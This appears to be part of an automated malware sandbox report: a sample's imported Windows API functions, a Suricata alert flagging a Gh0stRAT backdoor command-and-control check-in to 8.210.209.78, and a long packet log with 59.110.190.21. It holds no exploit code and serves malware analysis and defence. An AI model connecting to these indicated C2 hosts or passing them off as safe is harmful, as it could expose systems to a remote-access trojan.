GDI32.dll	PathToRegion, BitBlt, SetTextAlign, SetBkColor, SetBkMode, CreateSolidBrush, SetTextColor, BeginPath, MoveToEx, SetPolyFillMode, GetCurrentPositionEx, EndPath, CreatePen, StrokePath, StrokeAndFillPath, GdiFlush, SelectObject, DeleteObject, DeleteDC, CombineRgn, CreateRectRgn, GetDeviceCaps, GetTextMetricsW, CreateFontIndirectW, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBSection, TextOutW, GetTextExtentPoint32W
SHELL32.dll	ShellExecuteW
USER32.dll	SetCursor, SetClassLongPtrW, SendMessageW, GetClientRect, GetFocus, SystemParametersInfoW, DialogBoxIndirectParamW, CreateDialogIndirectParamW, GetDesktopWindow, GetSysColor, ReleaseCapture, AppendMenuW, wsprintfA, CreatePopupMenu, GetMessagePos, GetWindowTextW, MessageBoxW, OpenClipboard, CloseClipboard, SetClipboardData, GetWindowThreadProcessId, GetMenuStringW, EnableWindow, DestroyMenu, DrawMenuBar, ModifyMenuW, GetSystemMenu, InsertMenuW, GetAsyncKeyState, MessageBoxA, GetActiveWindow, SetWindowTextW, GetKeyNameTextW, GetKeyboardState, GetDlgItem, EndDialog, EnumWindows, CallWindowProcW, SetWindowLongPtrW, SendDlgItemMessageW, GetDlgItemTextW, EmptyClipboard, AttachThreadInput, UpdateWindow, ShowWindow, MoveWindow, RegisterHotKey, IsZoomed, GetWindow, IsWindow, IsIconic, DestroyWindow, SetWindowPos, EnumChildWindows, IsWindowVisible, TrackPopupMenu, TranslateMessage, PeekMessageW, SetWindowLongW, WindowFromPoint, PostQuitMessage, SetCapture, DefWindowProcW, GetCursorPos, PtInRect, GetWindowLongW, GetParent, SendMessageTimeoutW, GetClassNameW, PostMessageW, SetWindowRgn, InvalidateRect, GetDC, GetWindowRect, ReleaseDC, EndPaint, FillRect, SetForegroundWindow, ClientToScreen, wsprintfW, FindWindowW, IsDialogMessageW, DispatchMessageW, GetMessageW, KillTimer, UnregisterHotKey, RegisterWindowMessageW, GetSystemMetrics, GetForegroundWindow, LoadIconW, LoadCursorW, RegisterClassW, CreateWindowExW, SetTimer, BeginPaint
WINMM.dll	sndPlaySoundW, waveOutSetVolume, waveOutGetVolume

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-13T13:55:52.256232+0100	2852901	ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin	1	192.168.2.4	50018	8.210.209.78	8917	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2025 13:54:06.631743908 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:06.631819963 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:06.631903887 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:06.641244888 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:06.641264915 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:07.969038010 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:07.969208002 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:07.970134974 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:07.973500967 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.030230999 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.030256033 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:08.030702114 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:08.032984972 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.034348965 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.075337887 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:08.384293079 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:08.384380102 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.384403944 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:08.384450912 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.384474039 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:08.384525061 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.390386105 CET	49736	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.390405893 CET	443	49736	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:08.552269936 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.552364111 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:08.552522898 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.552746058 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:08.552781105 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:09.890897036 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:09.891026974 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:09.891479969 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:09.891499996 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:09.891666889 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:09.891680002 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.249747992 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.249804020 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.249862909 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.249901056 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.249918938 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.249927044 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.249950886 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.249972105 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.249994040 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.250021935 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.250540972 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.250614882 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.493633032 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.493766069 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.493778944 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.493824005 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.493868113 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.493885994 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.493887901 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.493912935 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.493973970 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.493973970 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.494679928 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.494750023 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.759124041 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.759217978 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.759305954 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.759305954 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.759341002 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.759381056 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.759706974 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.759788990 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.759955883 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.760026932 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.760832071 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.760905981 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.760929108 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.761004925 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.761734009 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.761799097 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.761802912 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.761821985 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.761862993 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.761885881 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.762732029 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.762792110 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.762808084 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.762821913 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.762856960 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.762895107 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:10.763570070 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:10.763642073 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.013695002 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.013860941 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.013864040 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.013897896 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.013919115 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.013946056 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.013966084 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.014024973 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.014164925 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.014225006 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.014251947 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.014307976 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.014686108 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.014753103 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.014771938 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.014833927 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.015243053 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.015310049 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.015450954 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.015518904 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.015548944 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.015607119 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.015635014 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.015696049 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.016299963 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.016362906 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.016391993 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.016449928 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.016475916 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.016536951 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.017193079 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.017285109 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.017291069 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.017335892 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.017342091 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.017388105 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.017415047 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.017471075 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.017960072 CET	49737	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.017975092 CET	443	49737	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.064491034 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.064541101 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:11.064613104 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.064835072 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:11.064850092 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.417124033 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.417217016 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:12.417757034 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:12.417772055 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.417963982 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:12.417972088 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.762635946 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.762693882 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.762728930 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:12.762765884 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.762780905 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:12.762818098 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:12.762833118 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.762892008 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:12.763391972 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:12.763452053 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.005919933 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.006002903 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.006123066 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.006171942 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.006241083 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.006299019 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.007002115 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.007057905 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.007072926 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.007118940 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.007713079 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.007766008 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.008574963 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.008719921 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.261143923 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.261243105 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.261265039 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.261323929 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.261672020 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.261725903 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.262037992 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.262095928 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.262129068 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.262180090 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.262630939 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.262686968 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.262716055 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.262768030 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.263552904 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.263623953 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.263657093 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.263715982 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.264435053 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.264504910 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.264528990 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.264605999 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.264616966 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.264646053 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.264671087 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.264915943 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.265259027 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.265321016 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.509016991 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.509088993 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.509160042 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.509216070 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.509356022 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.509409904 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.509607077 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.509659052 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.509700060 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.509756088 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.510039091 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.510096073 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.510133982 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.510183096 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.510231972 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.510288954 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.510303020 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.510344028 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.510432005 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.510479927 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.567853928 CET	49738	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.567924976 CET	443	49738	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.608645916 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.608702898 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:13.608800888 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.609006882 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:13.609041929 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:14.871620893 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:14.874931097 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:14.875432968 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:14.875447035 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:14.875612020 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:14.875617981 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.222528934 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.222587109 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.222630978 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.222688913 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.222726107 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.222728014 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.222745895 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.222759962 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.222784996 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.222810030 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.224111080 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.224195957 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.224308968 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.224406958 CET	443	49739	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.224473953 CET	49739	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.240037918 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.240098953 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:15.240187883 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.240451097 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:15.240467072 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.548181057 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.548270941 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.551070929 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.551148891 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.553586006 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.553606987 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.553945065 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.554014921 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.554805040 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.595324993 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.919768095 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.919786930 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.919827938 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.919898033 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.919948101 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.919949055 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.921708107 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.921777010 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.923852921 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.923909903 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:16.926096916 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:16.926145077 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.006288052 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.006373882 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.006380081 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.006409883 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.006428003 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.006453037 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.007652044 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.007705927 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.007728100 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.007772923 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.008450985 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.008498907 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.009005070 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.009054899 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.010606050 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.010660887 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.010694981 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.010741949 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.013056993 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.013104916 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.015132904 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.015187025 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.128812075 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.128928900 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.128964901 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.128966093 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.128993034 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129009008 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129009962 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129020929 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129034996 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129040956 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129064083 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129069090 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129089117 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129096031 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129106998 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129122972 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129146099 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129152060 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129163980 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129163980 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129194021 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129200935 CET	443	49740	59.110.190.21	192.168.2.4
Jan 13, 2025 13:54:17.129216909 CET	49740	443	192.168.2.4	59.110.190.21
Jan 13, 2025 13:54:17.129247904 CET	49740	443	192.168.2.4	59.110.190.21
